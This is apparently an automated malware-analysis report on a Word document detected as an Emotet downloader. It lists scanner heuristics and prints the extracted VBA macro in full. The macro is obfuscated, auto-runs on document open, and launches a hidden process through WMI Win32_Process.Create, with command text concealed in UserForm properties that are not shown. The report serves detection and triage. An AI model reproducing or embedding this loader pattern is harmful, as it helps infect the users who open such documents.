MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7451718-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7451718-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9594 bytes |
SHA-256: 6b1a61b17f2458a95e99ebfa01594acc21a98a51aeef5b057d91e6f0be23d0c1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
162 of 252 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sjzwtzgavjuc"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Vsvjzgyjrzdav, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select _
Case Gkhfokxr
Case 632
Bsbcklhm _
= Cos _
(331)
Esbshmrwvmvh = Atn(130)
Iicezihbzehr _
= Cos(51)
Case 689
Ydbmikynj = Atn(917)
Ctavwhuzgubic _
= 669
Ldtwlqwlxrk = CDate _
(977)
Case 924
Hwuznhwpgfdwn = _
CInt(457)
Lwvyytyuum = Log(Ghdelyvsk)
Uvqyfyqa = Naawljeibankz
End Select
Select _
Case Dgtgibcb
Case 311
Ueyeprfg _
= Cos _
(998)
Ehavswjiqj = Atn(944)
Qqwaqsbbq _
= Cos(248)
Case 67
Qsdvaoxaz = Atn(995)
Wvfxnmrtk _
= 903
Onhipameutjck = CDate _
(763)
Case 743
Aiutjczmtau = _
CInt(729)
Ojwkhqdqo = Log(Wnullmsuuymjz)
Xpbnhuhhqlx = Uzymqwxvhnbh
End Select
Select _
Case Neefbyyurskb
Case 692
Zyloasqlsko _
= Cos _
(819)
Xbgxmajcjjd = Atn(279)
Luxvzkrz _
= Cos(920)
Case 522
Bzvndbmuqdh = Atn(338)
Lvxaclqohuzg _
= 209
Xkegrinexrn = CDate _
(37)
Case 759
Xpmqtkbl = _
CInt(127)
Jooyzufw = Log(Nojlxqsfg)
Nwktzudfw = Xhurdjnk
End Select
Splhxibnp
End Sub
Attribute VB_Name = "Fodxhwzmz"
Attribute VB_Base = "0{18D9CF1A-F049-41BC-B873-4DBFCF6E4700}{00BE8A41-D2CD-45B3-9031-16D908976C67}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bmuopqew"
Function Xgtumzclb()
Select _
Case Iotsqkvlv
Case 727
Yyifsiggxqr _
= Cos _
(295)
Wmrhcdyyhgh = Atn(184)
Dqvwcjwzxsj _
= Cos(644)
Case 168
Wzesprudwesn = Atn(19)
Vorrazffplan _
= 944
Qythgihyuorql = CDate _
(484)
Case 711
Lcjtsbkgb = _
CInt(690)
Oqjsrbjx = Log(Kkgakwtcakowy)
Rupwfssyf = Pcxpgnvibsc
End Select
Ykboaqazck = Sjzwtzgavjuc.Vsvjzgyjrzdav
Select _
Case Qocfhjwgylcz
Case 135
Ljutfszzsmcy _
= Cos _
(363)
Jjzqspcexga = Atn(896)
Rbwbsjrbkpska _
= Cos(54)
Case 649
Vqdidhwomlg = Atn(817)
Hlotiuixvljo _
= 751
Ztgfruligcr = CDate _
(634)
Case 952
Unjpmvyuybz = _
CInt(492)
Mtafuuptx = Log(Fothzelbp)
Klvxtqtasge = Shbixdyxt
End Select
Xbanklpccm = Ykboaqazck + Fodxhwzmz.Mfzwggep + Fodxhwzmz.Rxisphkvcbj + Fodxhwzmz.Ffirrcbek
Select _
Case Efbwurnmq
Case 475
Qovpndyk _
= Cos _
(95)
Xzowgexntq = Atn(555)
Asqhdgymguia _
= Cos(41)
Case 128
Qbteiejuhf = Atn(562)
Nmqyxvhyndygz _
= 15
Ddcrnixovu = CDate _
(982)
Case 2
Oifkkudsm = _
CInt(523)
Xntpvndnf = Log(Greozrqxvein)
Isnmwzahvfe = Bbsgjrvcofwu
End Select
Vcsphyutxg = Xbanklpccm + Fodxhwzmz.Gdfedqumrahz + Fodxhwzmz.Adcynifadjy.ControlTipText
Select _
Case Uzdwafwkq
Case 999
Iiodxnqjh _
= Cos _
(939)
Auidlmkpgipz = Atn(979)
Xvypxykizsn _
= Cos(811)
Case 938
Kzlpmcayjnx = Atn(340)
Aarxtjinas _
= 696
Jfjsuqqrwaqv = CDate _
(283)
Case 180
Xeqohavn = _
CInt(894)
Rczelcjhtv = Log(Rgoxgcnzkweqm)
Mlqywgzarrmgu = Bxaznjzjut
End Select
Xgtumzclb = Nmomhxzxr + Vcsphyutxg + Nmomhxzxr
Select _
Case Bfcpoizjssgl
Case 620
Dyfazdzk _
= Cos _
(327)
Xcugzwjktp = Atn(133)
Bilpegvdakcr _
= Cos(614)
Case 658
Swhltqbssm = Atn(556)
Kvjvrlniwwok _
= 904
Paimzdzmemci = CDate _
(77)
Case 399
Tjqyblvzuesre = _
CInt(778)
Whxlzaakfnk = Log(Rwsjpopngqiox)
Duhycvhff = Yszklrtxhxlic
End Select
End Function
Function Splhxibnp()
Select _
Case Cuwsmnfzdcflf
Case 949
Hlynuxlk _
= Cos _
(444)
Qiujguphuabsg = Atn(205)
Pwwjmtfari _
= Cos(231)
Case 365
Uizrjluwfk = Atn(385)
Hqdkbapfkbebo _
= 387
Ekhcbwluzvjsg = CDate _
(299)
Case 894
Gegzbvpuyrte = _
CInt(135)
Dydinqlxioav = Log(Pshjurvz)
Zdopjlismbw = Ksvgiwsyg
End Select
Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess"
Select _
Case Pexhtsssmc
Case 18
Kefqrmnnzqmfw _
= Cos _
(244)
Lasfyobfccwxx = Atn(563)
Jekchzkh _
= Cos(242)
Case 336
Lkjzsrlbwgs = Atn(641)
Vjjycovpqfxgh _
= 589
Lwbsoqnergkk = CDate _
(986)
Case 200
Bbjqhptybitjy = _
CInt(228)
Mslxsqzez = Log(Iessrejtp)
Qafzmvtzesr = Nznsfbwkl
End Select
Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff)
Select _
Case Tjkmdcsffbsq
Case 385
Fliucrgbtb _
= Cos _
(915)
Igjiffyglvwha = Atn(568)
Elwbddawbaiif _
= Cos(642)
Case 362
Pjiftlwwwnse = Atn(738)
Paujrbpxza _
= 68
Khiwwsrsfn = CDate _
(817)
Case 931
Anioaolzbmmz = _
CInt(738)
Nmcsjilkboozq = Log(Fdcbzietbx)
Vhxviixeepn = Jpltzaylmwi
End Select
Vtvqkylc = Zmfpzzehhgbff + Fodxhwzmz.Rwtxaphjyf.ControlTipText + Fodxhwzmz.Hmevofwpu.ControlTipText
Select _
Case Lsriftrydqgts
Case 657
Ecorhxdd _
= Cos _
(178)
Nfzgimrh = Atn(937)
Puvxdizr _
= Cos(283)
Case 681
Yvhrdkfbkaiow = Atn(6)
Orsueomiknkg _
= 640
Yymlwfsxidx = CDate _
(451)
Case 791
Wjtaxqfprgw = _
CInt(542)
Lmweteonmb = Log(Azaqjpwx)
Yrmnplyhrpx = Fbektscjixxw
End Select
Wxszvkzmqhdba = Vtvqkylc + Sjzwtzgavjuc.Vsvjzgyjrzdav
Select _
Case Ltnkoouyan
Case 76
Uefrjmyxfmff _
= Cos _
(815)
Cxxfxzdcv = Atn(944)
Imktlaefd _
= Cos(504)
Case 496
Szpauxfzoi = Atn(297)
Lwavqzqsj _
= 309
Azndulazcu = CDate _
(533)
Case 11
Yqwfgxvww = _
CInt(693)
Yxkfogmvz = Log(Obgtknoidm)
Ceuukunyqxu = Jfmspyuhl
End Select
Set Splhxibnp = CreateObject(Wxszvkzmqhdba)
Select _
Case Bbrjowvgkek
Case 873
Eifxoigdzwqmy _
= Cos _
(456)
Wwomouurhk = Atn(903)
Wzyojejhq _
= Cos(33)
Case 161
Urjlcebxqi = Atn(323)
Nqxkfkryml _
= 64
Ebhghpgwzl = CDate _
(423)
Case 595
Firmfmmznpkym = _
CInt(268)
Xyyyjqzh = Log(Uqbbmkcwbewsf)
Zbwoqitn = Xamkfgaqok
End Select
Splhxibnp.XSize = False * False
Select _
Case Qyirzjrpsthta
Case 464
Rdguabtrqkoae _
= Cos _
(331)
Jwwfmymf = Atn(879)
Rnpywspjrliza _
= Cos(995)
Case 260
Xgsgljmapkkwu = Atn(569)
Exvwjnettrzrn _
= 288
Kvjkoruyzpem = CDate _
(637)
Case 743
Lwutrhldeeh = _
CInt(285)
Yplszxuzpnk = Log(Kyvhebefh)
Xvwjgrecw = Jowepfowikskw
End Select
Splhxibnp.YSize = False * False
Select _
Case Ajtlglezw
Case 381
Qcaxbdzwjts _
= Cos _
(216)
Zqloyuzlfyiph = Atn(934)
Nbxqqazbqcve _
= Cos(103)
Case 682
Hohqwlpzq = Atn(914)
Wekdriug _
= 104
Iwccwapvld = CDate _
(133)
Case 268
Hyjayllenkvo = _
CInt(418)
Pxyubxzvysfn = Log(Adexlcxmtr)
Vbvyaniaks = Csulzrvllze
End Select
Do While Jntjvyppzzc.Create(Null & Xgtumzclb, Aeefqcdyjukof, Splhxibnp)
Loop
Select _
Case Grsnftpk
Case 269
Qjysrgcnkrgzl _
= Cos _
(950)
Uvkiyghrdhdzf = Atn(731)
Wsncytsytry _
= Cos(396)
Case 77
Hvggsokxfby = Atn(628)
Sulngxcwv _
= 492
Ibfbxqramr = CDate _
(809)
Case 538
Axhrzqrrp = _
CInt(561)
Bxnflbruliu = Log(Jjaojxerinl)
Gdfewxwleeklg = Wxzfarhqqdhr
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.